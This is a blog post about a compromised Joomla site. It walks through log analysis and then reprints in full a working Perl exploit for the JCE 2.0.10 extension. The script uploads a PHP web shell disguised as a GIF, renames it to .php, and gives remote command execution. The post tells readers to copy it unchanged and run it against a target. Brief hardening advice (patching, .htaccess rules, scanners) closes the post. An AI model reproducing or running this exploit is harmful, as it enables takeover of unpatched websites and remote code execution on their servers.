Joomla Vulnerability JCE exploit
We all are aware of Joomla Framework but their are many vulnerabilities associated with it.
Some of them known, some unknown and some not discovered yet.
Let’s start with some which I am aware and have come across.
Scenario: A website, Example.com being hacked and compromised. It was reported by Maldet as shown below,
Now let’s Jump into This and below are the steps we normally follow when it’s an hack attempt.
Step 1: Log Analyzing
As you can see from the below image, it says [BOT JCE]
It can be clearly seen that JCE component of Joomla Version is vulnerable to Remote File Upload.
Step 2: Reverse Engineering (Let’s explore this Loop Hole to get the clear idea of the hack)
Copy the below perl script as it is,
Perl Version:######################################### http://www.bugreport.ir########################################## AmnPardaz Security Research & Penetration Testing Group### Title: Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version# Vendor: http://www.joomlacontenteditor.net# Vulnerable Version: JCE 2.0.10 (prior versions also may be affected)# Exploitation: Remote with browser# Original Advisory: http://www.bugreport.ir/index_78.htm# Vendor supplied patch: http://www.joomlacontenteditor.net/news/item/jce-2011-released# CVSS2 Base Score: (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5 # Coded By: iraqi h4ck###################################################################################################use IO::Socket;use LWP::Simple;system("cls");if(!defined($ARGV[0])) {print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";print "\t|||| Coded by: iraqi h4ck (admin[@]0-Day[dot]net) ||||\n\n";print "\t+--> Usage: perl $0 <host> <--+\n";print "\t+--> Example: perl $0 localhost <--+\n\n";exit; }print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";print "\t|||| Coded by: iraqi h4ck (admin[@]0-Day[dot]net) ||||\n\n";$TARGET = $ARGV[0];$PORT = "80";$SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20";$SHELL = "/images/stories/0day.php?cmd=";$header1G = "GET $SCRIPT HTTP/1.1";$header1H = "HEAD /images/stories/0day.php HTTP/1.1";$header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1";$header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1";$header2 = "Host: $TARGET";$header3 = "User-Agent: BOT/0.1 (BOT for JCE)";$header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334";$header5 = "Content-Length: 769";$header6 = "-----------------------------41184676334";$header7 = 'Content-Disposition: form-data; name="upload-dir"';$header8 = '/';$header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';$header10 = 'Content-Type: application/octet-stream';$header11 = 'Content-Disposition: form-data; name="upload-overwrite"';$header12 = "0";$header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"';$header14 = 'Content-Type: image/gif';$header15 = 'GIF89aG';$header16 = "<? system($_GET['cmd']);exit; ?>";$header17 = 'Content-Disposition: form-data; name="upload-name"';$header18 = '0day';$header19 = 'Content-Disposition: form-data; name="action"';$header20 = 'upload';$header21 = "-----------------------------41184676334--";$header22 = 'X-Request: JSON';$header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';$header25 = 'json={"fn":"folderRename","args":["/0day.gif","0day.php"]}';$header24 = "Content-Length: ".length($header25)."";############################################### Packet 1 --> Checking Exploitability #########################################################print "\n[*] Checking Exploitability ...\n\n";sleep 2;$pageURL=$TARGET.$SCRIPT;$simplePage=get($pageURL);@arr = ("2.0.11</title","2.0.12</title","2.0.13</title","2.0.14</title","2.0.15</title","1.5.7.10</title","1.5.7.11</title","1.5.7.12</title","1.5.7.13</title","1.5.7.14</title");while (($count!=10) && ($die != 1)) {foreach $arr(@arr){if ($simplePage =~ m/$arr/) {print "\n[*] Target patched.\n\n";$die = 1;} else {$count++;}}}if ($count==5) {print "[*] Target is exploitable.\n\n"};############################################### Packet 2 --> Uploading shell as a gif file #########################################################$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT")|| die "Can't connect to $TARGET";print "[*] Trying to upload 0day.gif ...\n\n";print $remote"$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";sleep 2;############################################### Packet 3 --> Change Extension from .gif to .php #########################################################print "[*] Trying to change extension from .gif to .php ...\n\n";$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT")|| die "Can't connect to $TARGET";print $remote"$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";############################################### Packet 4 --> Check forsuccessfully uploaded #########################################################$shellurl=$TARGET.$SHELL;$output=get($shellurl);while ($output = <$remote> ) {if ($output =~ /200 OK/) {print "[+] 0day.php was successfully uploaded\n\n";print "[+] Path:".$TARGET.$SHELL."id\n";}}
Example, name it as joohck.pl then use it as perl joohck.pl http://www.example.com as shown below,
Step 3: Bang 
… http://www.example.com/images/stories/0day.php?cmd=id
… http://www.example.com/images/stories/0day.php?cmd=id
0day.php was successfully uploaded, let’s browse the file,
Step 4: Check the logs as you will see the same [BOT JCE] entry. so we know how it got hacked, enough of being an hacker.
Step 5: How to secure your Joomla?
- Stringent .htaccess rules
- Change the default Joomla Tables prefix from jos_ to something different like smth then after change it in the configuration file as shown below,
Modify the configuration.php file in your main Joomla folder. In it locate the following line:
var $dbprefix = ‘jos_’;
change it to var $dbprefix = ‘smth_’;
- Update the plugins and apply patches and keep Joomla Version up-to-date.
- Password protect your administrative area.
- Follow below links for stringent .htaccess rule,
PS: have multiple scanners running on your server, it’s saving our asses big time,
- Maldet
- Clamav
- chkrootkit
Comments
Post a Comment